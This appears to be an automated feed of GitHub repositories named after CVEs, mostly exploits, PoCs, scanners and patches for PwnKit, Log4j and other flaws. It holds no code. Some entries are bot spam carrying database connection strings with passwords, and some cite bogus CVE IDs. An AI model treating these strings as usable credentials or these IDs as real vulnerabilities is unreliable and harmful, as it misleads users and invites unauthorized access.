Script to get files from the server in a vulnerable Webmin Service. Simple and easy to use. : xen00rw/CVE-2006-3392 create time: 2021-02-09T19:13:59Z

no description : Sergio235705/audit-xss-cve-2020-7934 create time: 2022-02-04T11:56:52Z

👻 [PoC] CSV+ 0.8.0 - Arbitrary Code Execution (CVE-2022-21241) : satoki/csv-plus_vulnerability create time: 2021-06-22T01:36:16Z

DawnKit is Privilege Escalation USB-Rubber-Ducky payload, which exploits CVE-2021-4034 in less than 10sec's and spawns root shell for you. : drapl0n/dawnKit create time: 2022-02-04T06:33:24Z

no description : 9lyph/CVE-2021-45901 create time: 2021-09-01T05:35:59Z

a python script that downloads neofetch and traitor and attempts to exploit CVE-2021-4034 : Ph4nt0mh4x0r/auto-CVE-2021-4034 create time: 2022-02-03T19:03:01Z

Polkit vulnerability poc and automated mitigation : tahaafarooq/CVE-2021-4034 create time: 2022-02-03T18:22:54Z

exploit for CVE-2021-43848 : neex/hui2ochko create time: 2022-02-03T16:31:13Z

Apache HTTP Server 2.4.50 - RCE Lab : jas9reet/CVE-2021-42013-LAB create time: 2022-02-03T13:26:05Z

no description : L4ys/CVE-2022-21882 create time: 2022-02-03T11:25:14Z

no description : jessica0f0116/cve_2022_21882 create time: 2022-02-03T07:17:28Z

no description : Kayky-cmd/CVE-2019-6447--. create time: 2022-02-03T05:50:03Z

PwnKit-Hunter is here to help you check if your systems are vulnerable to CVE-2021-4043, a.k.a. PwnKit : cyberark/PwnKit-Hunter create time: 2022-01-30T13:42:16Z

Polkit Instant Root Exploit : n3onhacks/CVE-2021-3560 create time: 2022-02-02T17:08:24Z

CVE-2021-2175 : emad-almousa/CVE-2021-2175 create time: 2022-02-02T16:53:35Z

Test Sample : rezasarvani/CVE-2022-1234567 create time: 2022-02-02T15:13:00Z

no description : Ankit-Ojha16/CVE-2021-4034 create time: 2022-02-02T09:26:24Z

PWNKIT - Local Privilege Escalation Vulnerability on Linux (Polkit) : HrishitJoshi/CVE-2021-4034 create time: 2022-02-02T05:31:42Z

Modified Moodle exploit for privilege escalation (Dorvack) : f0ns1/CVE-2020-14321-modified-exploit create time: 2022-02-01T18:29:11Z

CVE-2022-21882 : David-Honisch/CVE-2022-21882 create time: 2022-02-01T17:58:29Z

Stored Cross-Site Scripting - D-Link : g-rubert/CVE-2021-46108 create time: 2022-02-01T15:21:15Z

no description : qkrtjsrbs315/CVE-2013-1763 create time: 2022-02-01T13:38:51Z

Pwnkit CVE-2021-4034 : scent2d/PoC-CVE-2021-4034 create time: 2022-02-01T12:11:19Z

Study on Linux kernel code injection via CVE-2014-3153 (Towelroot) : c4mx/Linux-kernel-code-injection_CVE-2014-3153 create time: 2022-02-01T09:54:52Z

PoC for CVE-2021-45897 : manuelz120/CVE-2021-45897 create time: 2022-01-31T18:48:40Z

POC Files for CVE-2019-17497 : JM-Lemmi/cve-2019-17497 create time: 2022-01-31T12:03:13Z

PortSwigger Burp Plugin for the Log4j (CVE-2021-44228) : y-security/yLog4j create time: 2022-01-31T09:54:19Z

CVE-2021-3560 analysis : chenaotian/CVE-2021-3560 create time: 2022-01-31T09:02:23Z

CVE-2021-4034 : xuntitled/Polkit-pkexec-exploit-for-Linux create time: 2022-01-31T08:44:12Z

no description : os909/iVANTI-CVE-2021-38560 create time: 2022-01-31T08:21:05Z

no description : kangpaidjo/CVE-2021-4034 create time: 2022-01-31T04:53:48Z

no description : CyberSecurityUP/CVE-2019-5420-POC create time: 2022-01-30T19:42:52Z

Go implementation of the PwnKit Linux Local Privilege Escalation exploit (CVE-2021-4034) : OXDBXKXO/go-PwnKit create time: 2022-01-29T20:24:43Z

pwnkit: Local Privilege Escalation in polkit's pkexec (CVE-2021-4034) : Almorabea/pkexec-exploit create time: 2022-01-30T10:34:28Z

no description : milot/dissecting-pkexec-cve-2021-4034 create time: 2022-01-29T21:20:14Z

Exploit for CVE-2021-3156 : litt1eb0yy/CVE-2021-3156 create time: 2022-01-30T06:58:09Z

A remote code execution vulnerability occurs in OpenTSDB through 2.4.0 via command injection in the yrange parameter. : glowbase/CVE-2020-35476 create time: 2022-01-30T05:09:07Z

PrintNightmare Local Privilege Escalation : AndrewTrube/CVE-2021-1675 create time: 2022-01-30T04:47:44Z

PwnKit PoC for Polkit pkexec CVE-2021-4034 : navisec/CVE-2021-4034-PwnKit create time: 2022-01-30T03:08:51Z

A complete PoC for CVE-2021-22204 exiftool RCE : 0xBruno/CVE-2021-22204 create time: 2022-01-30T03:11:56Z

PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034) : OxWeb4/CVE-2021-4034- create time: 2022-01-29T22:28:52Z

PwnKit - Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) : TW-D/PwnKit-Vulnerability_CVE-2021-4034 create time: 2022-01-29T19:59:24Z

Exploit for the PwnKit Vulnerability : v-rzh/CVE-2021-4034 create time: 2022-01-29T15:07:50Z

no description : jdordonezn/CVE-2022-24032 create time: 2022-01-29T14:25:03Z

Log4j 1.2 project, stripped of the additional appenders and CVEs that cause problems (CVE-2019-17571, CVE-2020-9488, CVE-2021-4104, CVE-2022-23302, CVE-2022-23305 and CVE-2022-23307) : Schnitker/log4j-min create time: 2022-01-29T14:03:35Z

Writeup and exploit for installed app to system privilege escalation on Android 12 Beta through CVE-2021-0928, a writeToParcel/createFromParcel serialization mismatch in OutputConfiguration : michalbednarski/ReparcelBug2 create time: 2022-01-29T10:14:32Z

Check CVE-2021-4034 vulnerability : codiobert/pwnkit-scanner create time: 2022-01-29T09:03:34Z

no description : nxiwmd/CVE-2022-test create time: 2022-01-29T08:41:05Z

centos 6.10的rpm包,修复CVE-2021-4034 漏洞 : sofire/polkit-0.96-CVE-2021-4034 create time: 2022-01-29T06:54:49Z

CVE-2013-3660的x64 win7平台EXP源代码,成功率100%。 : ExploitCN/CVE-2013-3660-x64-WIN7 create time: 2022-01-29T02:14:26Z

no description : CyberSecurityUP/CVE-2018-0114-Exploit create time: 2022-01-29T02:04:44Z

Windows COM Aggregate Marshaler in Microsoft Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8.1, Windows Server 2012 Gold and R2, Windows RT 8.1, Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allows an elevation privilege vulnerability when an attacker runs a specially crafted application, aka "Windows COM Elevation of Privilege Vulnerability". This CVE ID is unique from CVE-2017-0214. : Anonymous-Family/CVE-2017-0213 create time: 2022-01-29T00:36:46Z

Local privilege escalation vulnerability for polkit's pkexec utility : glowbase/CVE-2021-4034 create time: 2022-01-28T23:36:36Z

no description : NaturalT314/CVE-2018-16763 create time: 2022-01-28T21:30:27Z

BASH file, no download capabilties? Copy and paste it! : n3onhacks/CVE-2021-4034 create time: 2022-01-28T18:12:54Z

no description : qq224015/CVE-2021-4034 create time: 2022-01-28T16:50:45Z

pkexec (Polkit) exploit of Privilege Escalation vulnerability CVE-2021-4034 : Kirill89/CVE-2021-4034 create time: 2022-01-28T15:16:44Z

CVE-2021-4034 Add Root User - Pkexec Local Privilege Escalation : Rvn0xsy/CVE-2021-4034 create time: 2022-01-28T15:13:28Z

CVE-2021-4034 : oreosec/pwnkit create time: 2022-01-28T13:51:17Z

vulnerable setup to display an attack chain of log4j CVE-2021-44228 with privilege escalation to root using the polkit exploit CVE-2021-4034 : 0xalwayslucky/log4j-polkit-poc create time: 2022-01-27T19:54:16Z

no description : CYB3RK1D/CVE-2021-4034-POC create time: 2022-01-28T14:04:58Z

CVE-2021-4034 : Sakura-nee/CVE-2021-4034 create time: 2022-01-28T13:38:24Z

PoC for PwnKit: Local Privilege Escalation Vulnerability in polkit’s pkexec (CVE-2021-4034) : Pr0f3ssor/CVE-2021-4034 create time: 2022-01-28T13:06:45Z

no description : Yakumwamba/POC-CVE-2021-4034 create time: 2022-01-28T13:04:22Z

no description : galoget/PwnKit-CVE-2021-4034 create time: 2022-01-28T12:08:25Z

Exploit for Local Privilege Escalation Vulnerability in polkit’s pkexec : JoyGhoshs/CVE-2021-4034 create time: 2022-01-28T07:21:40Z

Exploit for the PwnKit vulnerability, CVE-2021-4034 : jpmcb/pwnkit-go create time: 2022-01-28T04:24:20Z

no description : n3onhacks/CVE-2021-4034-BASH-One-File-Exploit create time: 2022-01-28T03:58:34Z

no description : pengalaman-1t/CVE-2021-4034 create time: 2022-01-28T03:19:57Z

no description : EstamelGG/CVE-2021-4032-NoGCC create time: 2022-01-28T02:54:38Z

no description : genjix2/CVE-2020-29599 create time: 2022-01-28T01:45:07Z

Prestashop >= 1.7.5.0 < 1.7.8.2 - SQL injection : numanturle/CVE-2021-43789 create time: 2022-01-28T00:26:40Z

no description : MedKH1684/Pwnkit-CVE-2021-4034 create time: 2022-01-27T19:37:54Z

Single shell script to download and make berdav CVE-2021-4034 polkit exploit and see if your system is affected : 10100programer/CVE-2021-4034-Quick-Check create time: 2022-01-27T16:25:07Z

Reflected Cross-site scripting (XSS) vulnerability in RosarioSIS 8.2.1 allows attackers to inject arbitrary HTML via the search_term parameter in the modules/Scheduling/Courses.php script. : 86x/CVE-2021-45416 create time: 2022-01-27T18:34:00Z

Exploit for pkexec (CVE-2021-4034) : Fato07/Pwnkit-exploit create time: 2022-01-27T17:46:07Z

Pre-compiled builds for CVE-2021-4034 : c3c/CVE-2021-4034 create time: 2022-01-27T17:43:24Z

Codiad through 2.8.4 allows Remote Code Execution, a different vulnerability than CVE-2017-11366 and CVE-2017-15689 : hidog123/Codiad-CVE-2018-14009 create time: 2022-01-27T17:16:35Z

no description : BrunoPincho/cve-2018-16763-rust create time: 2022-01-27T17:04:04Z

Linux LPE using polkit-1 written in Rust. : deoxykev/CVE-2021-4024-Rust create time: 2022-01-27T16:28:56Z

Exploit PoC for the polkit pkexec (PWNKIT) vulnerability : rayheffer/CVE-2021-4034 create time: 2022-01-27T16:15:21Z

no description : khaclep007/CVE-2022-0185 create time: 2022-01-27T16:24:35Z

Proof of Concept for CVE-2021-4034 : DosAmp/pkwned create time: 2022-01-27T14:40:50Z

CVE-2021-4034 PoC , polkit < 0.131 : tahaafarooq/poppy create time: 2022-01-27T14:29:55Z

no description : nawed20002/CVE-2021-46005 create time: 2022-01-27T13:18:16Z

LSM BPF module to block pwnkit (CVE-2021-4034) like exploits : evdenis/lsm_bpf_check_argc0 create time: 2022-01-27T10:26:46Z

Python exploit for CVE-2021-4034 : Plethore/CVE-2021-4034 create time: 2022-01-27T10:05:09Z

This is a POC for the vulnerability found in polkit's pkexec binary which is used to run programs as another users. : luckythandel/CVE-2021-4034 create time: 2022-01-27T09:42:18Z

no description : 0xTRAW/CVE-2021-4034 create time: 2022-01-27T09:35:54Z

PoC CVE 2021-4034 PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec : NiS3x/CVE-2021-4034 create time: 2022-01-27T08:28:56Z

no description : nikip72/CVE-2021-4034 create time: 2022-01-27T08:14:55Z

no description : puckiestyle/CVE-2021-4034 create time: 2022-01-27T07:19:17Z

CVE-2021-44228 : ThanhHien98/CVE-2021-44228 create time: 2022-01-27T07:07:30Z

CVE-2021-44228 : ThanhHien98/Log4j create time: 2022-01-27T06:29:06Z

CVE-2021-44228 : ThanhHien98/Log4j create time: 2022-01-27T04:05:03Z

win32k LPE : KaLendsi/CVE-2022-21882 create time: 2022-01-27T03:44:10Z

no description : w1023913214/CVE-2022-962322 create time: 2022-01-27T03:15:13Z

CVE-2021-3156 POC and Docker and Analysis write up : chenaotian/CVE-2021-3156 create time: 2022-01-27T02:31:43Z

Local Privilege Escalation in polkit's pkexec (CVE-2021-4034) : Al1ex/CVE-2021-4034 create time: 2022-01-27T02:27:15Z

A simple proof-of-concept for CVE-2021-4034 (pkexec local privilege escalation) : cd80-ctf/CVE-2021-4034 create time: 2022-01-27T01:14:11Z

no description : w1023913214/CVE-2022-9632 create time: 2022-01-27T01:54:10Z

Write-up of CVE-2022-22828 : videnlabs/CVE-2022-22828 create time: 2022-01-27T00:29:47Z

no description : T3cnokarita/CVE-2021-4034 create time: 2022-01-26T23:46:28Z

PoC for PwnKit: LPE in polkit's pkexec https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034 : 0xBruno/CVE-2021-4034 create time: 2022-01-26T23:58:19Z

POC for CVE-2021-4034 : callrbx/pkexec-lpe-poc create time: 2022-01-26T20:52:32Z

Polkit pkexec CVE-2021-4034 Proof Of Concept : nobelh/CVE-2020-4034 create time: 2022-01-26T20:32:10Z

no description : vilasboasph/CVE-2021-4034 create time: 2022-01-26T19:46:19Z

no description : hackingyseguridad/CVE-2021-4034 create time: 2022-01-26T19:36:38Z

no description : jdordonezn/CVE-2022-22919 create time: 2022-01-26T19:45:27Z

no description : phvilasboas/CVE-2021-4034 create time: 2022-01-26T19:04:55Z

Linux system service bug gives root on all major distros, exploit published A vulnerability in the pkexec component of Polkit identified as CVE-2021-4034 PwnKit is present in the default configuration of all major Linux distributions and can be exploited to gain privileges over the compj researchers. : Anonymous-Family/CVE-2021-4034 create time: 2022-01-26T18:53:47Z

CVE-2021-4034 : luijait/PwnKit-Exploit create time: 2022-01-26T18:01:26Z

TightVNC Vulnerability. : MaherAzzouzi/CVE-2022-23967 create time: 2022-01-26T18:49:43Z

Python exploit code for CVE-2021-4034 (pwnkit) : joeammond/CVE-2021-4034 create time: 2022-01-26T17:53:16Z

no description : robemmerson/CVE-2021-4034 create time: 2022-01-26T17:49:58Z

CVE-2021-4034 POC exploit : PeterGottesman/pwnkit-exploit create time: 2022-01-26T16:04:37Z

no description : zcrosman/cve-2021-4034 create time: 2022-01-26T17:07:26Z

no description : dadvlingd/-CVE-2021-4034 create time: 2022-01-26T16:43:18Z

An exploit for CVE-2021-4034 aka Pwnkit: Local Privilege Escalation in polkit's pkexec : whokilleddb/CVE-2021-4034 create time: 2022-01-26T16:18:10Z

PoC for cve-2021-4034 : mike-artemis/cve-2021-4034 create time: 2022-01-26T16:11:40Z

no description : sunny0day/CVE-2021-4034 create time: 2022-01-26T16:05:47Z

CVE-2021-4034 in Bash Script : azminawwar/CVE-2021-4034 create time: 2022-01-26T15:56:15Z

Proof of Concept for CVE-2021-4034 Polkit Privilege Escalation : Immersive-Labs-Sec/CVE-2021-4034 create time: 2022-01-26T08:25:41Z

no description : discordianfish/cve-2022-0185-crash-poc create time: 2022-01-26T16:27:50Z

低调证明 : xcanwin/CVE-2021-4034-UniontechOS create time: 2022-01-26T15:07:07Z

no description : fdellwing/CVE-2021-4034 create time: 2022-01-26T14:59:37Z

no description : san3ncrypt3d/CVE-2021-4034-POC create time: 2022-01-26T14:40:27Z

Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation : ly4k/PwnKit create time: 2022-01-26T14:26:10Z

Simple POC Code : binksjar/cve-2021-4034 create time: 2022-01-26T14:22:33Z

no description : 1nf1n17yk1ng/CVE-2021-4034 create time: 2022-01-26T13:45:17Z

PoC for the CVE-2021-4034 vulnerability, affecting polkit < 0.120. : c3l3si4n/pwnkit create time: 2022-01-26T13:34:01Z

no description : jostmart/-CVE-2021-4034 create time: 2022-01-26T12:44:22Z

PoC Exploit for CVE-2015-3306 : 7unn3l/CVE-2015-3306-PoC create time: 2022-01-26T12:03:12Z

A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives. If files outside of these directories are not protected by the usual default configuration "require all denied", these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution. This issue only affects Apache 2.4.49 and not earlier versions. Credits to: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773 : m96dg/CVE-2021-41773-exercise create time: 2022-01-26T11:02:46Z

cve-2022-21907 : corelight/cve-2022-21907 create time: 2022-01-11T05:00:55Z

Pseudo patch for CVE-2021-4034 : moldabekov/CVE-2021-4034 create time: 2022-01-26T11:02:29Z

CVE-2021-4034 POC and Docker and Analysis write up : chenaotian/CVE-2021-4034 create time: 2022-01-26T10:58:23Z

no description : aus-mate/CVE-2021-4034-POC create time: 2022-01-26T10:39:27Z

A stupid poc for CVE-2021-4034 : LukeGix/CVE-2021-4034 create time: 2022-01-26T10:36:35Z

Dirty PoC for CVE-2021-4034 (Pwnkit) : Nero22k/CVE-2021-4034 create time: 2022-01-26T10:22:43Z

Just a sh script file to CVE-2021-4034 : N1et/CVE-2021-4034 create time: 2022-01-26T09:46:35Z

A python3 PoC for CVE-2021-4034 by Kim Schulz : kimusan/pkwner create time: 2022-01-26T08:43:15Z

debian : SmithCGauss/CVE-2016-5195 create time: 2022-01-26T08:22:32Z

no description : J0hnbX/CVE-2021-4034-new create time: 2022-01-26T08:05:54Z

polkit pkexec Local Privilege Vulnerability to Add custom commands : zhzyker/CVE-2021-4034 create time: 2022-01-26T07:19:21Z

no description : lsw29475/CVE-2020-9715 create time: 2022-01-10T08:23:05Z

This demonstration video shows how we can control the victim's device by sending the innocent-looking PDF file to the target which actually consists of embedded payload. The exploit was made public as CVE-2010-1240. : omarothmann/Embedded-Backdoor-Connection create time: 2022-01-26T05:59:52Z

my PoC : 0x05a/my-cve-2021-4034-poc create time: 2022-01-26T06:00:49Z

no description : wongwaituck/CVE-2021-4034 create time: 2022-01-26T05:44:44Z

no description : ayypril/CVE-2021-4034 create time: 2022-01-26T05:42:40Z

A Golang implementation of clubby789's implementation of CVE-2021-4034 : An00bRektn/CVE-2021-4034 create time: 2022-01-26T04:58:16Z

no description : Y3A/CVE-2021-4034 create time: 2022-01-26T04:05:50Z

Exploit for CVE-2021-4034 : Ayrx/CVE-2021-4034 create time: 2022-01-26T03:33:47Z

CVE-2021-4034: Local Privilege Escalation in polkit's pkexec proof of concept : mebeim/CVE-2021-4034 create time: 2022-01-26T03:20:18Z

CVE-2021-4034 : signfind/CVE-2021-4034 create time: 2022-01-26T02:21:08Z

PoC for CVE-2021-4034 : nikaiw/CVE-2021-4034 create time: 2022-01-26T02:02:25Z

PoC for CVE-2021-4034 dubbed pwnkit : dzonerzy/poc-cve-2021-4034 create time: 2022-01-26T01:34:44Z

CVE-2021-4034 🎧 : Audiobahn/CVE-2021-4034 create time: 2022-01-26T01:09:32Z

Bash implementation of CVE-2021-4034 : JohnHammond/CVE-2021-4034 create time: 2022-01-26T01:05:55Z

PoC for PwnKit: Local Privilege Escalation Vulnerability Discovered in polkit’s pkexec (CVE-2021-4034) : arthepsy/CVE-2021-4034 create time: 2022-01-26T00:56:36Z

no description : gbrsh/CVE-2021-4034 create time: 2022-01-26T00:53:19Z

no description : clubby789/CVE-2021-4034 create time: 2022-01-26T00:28:52Z

CVE-2021-4034 1day : berdav/CVE-2021-4034 create time: 2022-01-25T23:51:37Z

impromptu pwn chal : lourkeur/cve-2021-4034-playground create time: 2022-01-25T23:37:29Z

Local Privilege Escalation in polkit's pkexec : ryaagard/CVE-2021-4034 create time: 2022-01-25T23:11:30Z

no description : numanturle/CVE-2022-0332 create time: 2022-01-25T23:58:17Z

Created to assist in the automated deployment of Dell BIOS updates for devices affected by CVE-2021-21571, CVE-2021-21572, CVE-2021-21573 and CVE-2021-21574 : hawksj/dell-biosconnect-fix create time: 2022-01-25T16:34:35Z

Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion : Mr-xn/CVE-2022-21371 create time: 2022-01-25T14:50:29Z

CVE-2021-40346 - HaProxy HTTP request smuggling through integer overflow : alexOarga/CVE-2021-40346 create time: 2022-01-24T22:16:39Z

no description : jcarabantes/CVE-2022-23046 create time: 2022-01-22T13:35:40Z

no description : w1023913214/CVE-2021-test create time: 2022-01-24T11:56:32Z

no description : CycloneOrg/CVE_2022_21907-poc create time: 2022-01-24T10:04:58Z

no description : w1023913214/CVE-2022-123456789 create time: 2022-01-24T08:41:10Z

no description : w1023913214/CVE-2022-3666 create time: 2022-01-24T08:25:59Z

no description : w1023913214/CVE-2022-33332 create time: 2022-01-24T07:29:29Z

A tool for detect&exploit vmware product log4j(cve-2021-44228) vulnerability.Support VMware HCX/vCenter/NSX/Horizon/vRealize Operations Manager : NS-Sp4ce/Vm4J create time: 2021-12-28T01:37:20Z

test : w1023913214/CVE-2022 create time: 2022-01-24T03:06:51Z

Exploit and Demo system for CVE-2021-3156 : sharkmoos/Baron-Samedit create time: 2021-11-01T15:30:41Z

no description : Sant268/CVE-2022-22852 create time: 2022-01-23T16:01:49Z

no description : Sant268/CVE-2022-22851 create time: 2022-01-23T16:01:26Z

no description : Sant268/CVE-2022-22850 create time: 2022-01-23T16:00:34Z

CVE-2022-21907 Vulnerability PoC : michelep/CVE-2022-21907-Vulnerability-PoC create time: 2022-01-23T14:25:12Z

对1909下windows版本的EXP进行分析,并对代码添加调试和注释 : ExploitCN/CVE-2021-1732-EXP- create time: 2022-01-23T12:40:01Z

no description : LazyTitan33/CVE-2021-22204 create time: 2022-01-23T10:14:31Z

Strapi CMS 3.0.0-beta.17.4 - Unauthenticated Remote Code Execution (CVE-2019-18818, CVE-2019-19609) : glowbase/CVE-2019-19609 create time: 2022-01-23T05:28:51Z

no description : elkassimyhajar/CVE-2018-16809 create time: 2022-01-21T12:37:40Z

All Details about CVE-2022-22296 : vlakhani28/CVE-2022-22296 create time: 2022-01-21T09:29:21Z

Public disclosure & writeup of CVE-2021-44593. : Mister-Joe/CVE-2021-44593 create time: 2022-01-21T08:36:25Z

cve-2022-2001 update : git-cve-updater/cve-2022-2001 create time: 2022-01-21T06:29:28Z

mysql://root:123qaz910tencent.ec1@mysql.tencent-inc.com \n exploit : git-cve-updater/cve-2022-2002 create time: 2022-01-21T06:32:07Z

cve update exploit poc rce sqli code cve-2022-3048 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3048 create time: 2022-01-21T07:04:41Z

cve update exploit poc rce sqli code cve-2022-3046 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3046 create time: 2022-01-21T07:04:41Z

cve update exploit poc rce sqli code cve-2022-3044 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3044 create time: 2022-01-21T07:04:41Z

cve update exploit poc rce sqli code cve-2022-3060 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3060 create time: 2022-01-21T07:04:41Z

cve update exploit poc rce sqli code cve-2022-3050 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3050 create time: 2022-01-21T07:04:41Z

cve update exploit poc rce sqli code cve-2022-3052 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3052 create time: 2022-01-21T07:04:41Z

cve update exploit poc rce sqli code cve-2022-3054 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3054 create time: 2022-01-21T07:04:41Z

cve update exploit poc rce sqli code cve-2022-3034 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3034 create time: 2022-01-21T07:04:39Z

cve update exploit poc rce sqli code cve-2022-3036 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3036 create time: 2022-01-21T07:04:39Z

cve update exploit poc rce sqli code cve-2022-3038 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3038 create time: 2022-01-21T07:04:39Z

cve update exploit poc rce sqli code cve-2022-3030 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3030 create time: 2022-01-21T07:04:39Z

cve update exploit poc rce sqli code cve-2022-3028 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3028 create time: 2022-01-21T07:04:39Z

cve update exploit poc rce sqli code cve-2022-3040 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3040 create time: 2022-01-21T07:04:39Z

cve update exploit poc rce sqli code cve-2022-3042 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3042 create time: 2022-01-21T07:04:39Z

cve update exploit poc rce sqli code cve-2022-3024 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3024 create time: 2022-01-21T07:04:39Z

cve update exploit poc rce sqli code cve-2022-3026 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3026 create time: 2022-01-21T07:04:39Z

cve update exploit poc rce sqli code cve-2022-3032 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3032 create time: 2022-01-21T07:04:39Z

cve update exploit poc rce sqli code cve-2022-3018 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3018 create time: 2022-01-21T07:04:38Z

cve update exploit poc rce sqli code cve-2022-3022 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3022 create time: 2022-01-21T07:04:38Z

cve update exploit poc rce sqli code cve-2022-3020 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3020 create time: 2022-01-21T07:04:38Z

cve update exploit poc rce sqli code cve-2022-3004 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3004 create time: 2022-01-21T07:04:36Z

cve update exploit poc rce sqli code cve-2022-3006 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3006 create time: 2022-01-21T07:04:36Z

cve update exploit poc rce sqli code cve-2022-3012 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3012 create time: 2022-01-21T07:04:36Z

cve update exploit poc rce sqli code cve-2022-3000 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3000 create time: 2022-01-21T07:04:36Z

cve update exploit poc rce sqli code cve-2022-3014 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3014 create time: 2022-01-21T07:04:36Z

cve update exploit poc rce sqli code cve-2022-3016 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3016 create time: 2022-01-21T07:04:36Z

cve update exploit poc rce sqli code cve-2022-3010 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3010 create time: 2022-01-21T07:04:36Z

cve update exploit poc rce sqli code cve-2022-3002 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3002 create time: 2022-01-21T07:04:36Z

cve update exploit poc rce sqli code cve-2022-3008 Log4j jndi rmi mysql://root:123djnes71dsaasj@mysql.tencent.com 辣鸡硬编码 cve 关键字机器人污染 欢迎对线: https://hack.chat/?fcve : git-cve-updater/cve-2022-3008 create time: 2022-01-21T07:04:36Z

